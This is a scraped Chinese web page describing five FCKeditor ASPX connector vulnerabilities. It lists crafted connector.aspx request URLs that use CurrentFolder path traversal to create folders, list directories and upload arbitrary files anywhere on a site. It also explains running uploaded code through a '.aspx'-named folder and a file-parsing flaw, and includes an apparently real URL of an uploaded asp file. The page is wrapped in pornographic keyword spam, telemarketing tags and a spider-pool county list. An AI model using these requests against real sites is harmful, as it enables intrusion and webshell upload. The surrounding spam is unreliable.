婷婷综合国产,91蜜桃婷婷狠狠久久综合9色 ,九九九九九精品,国产综合av

主頁 > 知識庫 > FCKeditor 新聞組件的一些程序漏洞

FCKeditor 新聞組件的一些程序漏洞
熱門標簽:企業電話機器人辦理 四平電話機器人哪家好 株洲外呼營銷系統有哪些 長春防封卡電銷卡套餐 智能電銷機器人真的好嗎 長春銷售外呼系統業務 靈聲智能電話機器人招聘 天津電銷卡外呼系統線路 興化400電話辦理多少錢
1 CurrentFolder 參數,可以在網站中不同目錄新建文件夾,參數使用 ../../來篡改參數,進入不同的目錄
/browser/default/connectors/aspx/connector.aspx?Command=CreateFolderType=ImageCurrentFolder=../../..%2FNewFolderName=aspx.asp


2 CurrentFolder 參數,根據返回的XML信息可以查看網站所有的目錄,比如 “../../../”進入不同的目錄,讓后通過XML返回的消息就可以看到沒有權限的頁面browser/default/connectors/aspx/connector.aspx?Command=GetFoldersAndFilesType=ImageCurrentFolder=%2F

3 上傳文件時,通過修改CurrentFolder參數,可以將文件上傳到不同的目錄
/browser/default/connectors/aspx/connector.aspx?Command=FileUploadType=ImageCurrentFolder=%2F

4 同時修改Type 和CurrentFolder 參數,可以上傳任意類型文件到網站任意目錄,基本上網站就完蛋了。
/browser/default/connectors/aspx/connector.aspx?Command=FileUploadType=ImageCurrentFolder=%2F

http://samsungfriend.local.opentide.com.cn/upload/fckroots/Image/asp.asp/asp.asp



5 通過創建文件夾的功能,創建名字帶有.aspx的文件夾,如:file.aspx等,利用文件解析漏洞,在該文件夾下上傳有代碼的.jpg 或.rar等文件(實際文件是.aspx,把文件名該后綴),上傳之后就可以利用漏洞執行代碼了。 如:www.xxx.com/upload/file.aspx/123.jpg 輸入之后,代碼被成功執行。

標簽:運城 貴港 黑龍江 新疆 石嘴山 青海 漯河 巴彥淖爾

巨人網絡通訊聲明:本文標題《FCKeditor 新聞組件的一些程序漏洞》,本文關鍵詞  FCKeditor,新聞,組件,的,一些,;如發現本文內容存在版權問題,煩請提供相關信息告之我們,我們將及時溝通與處理。本站內容系統采集于網絡,涉及言論、版權與本站無關。
  • 相關文章
  • 下面列出與本文章《FCKeditor 新聞組件的一些程序漏洞》相關的同類信息!
  • 本頁收集關于FCKeditor 新聞組件的一些程序漏洞的相關信息資訊供網民參考!
    • 推薦文章
    主站蜘蛛池模板: 天峻县| 恩施市| 金门县| 健康| 永吉县| 商河县| 太原市| 甘肃省| 鄂托克旗| 包头市| 忻城县| 瑞安市| 宽甸| 南靖县| 镇安县| 彝良县| 鹰潭市| 花垣县| 邻水| 井研县| 屯留县| 宁蒗| 台中县| 磐石市| 新和县| 西畴县| 修文县| 长宁区| 博白县| 武夷山市| 武安市| 翁源县| 郁南县| 靖江市| 临邑县| 舒城县| 广安市| 沙田区| 甘洛县| 山西省| 贵港市|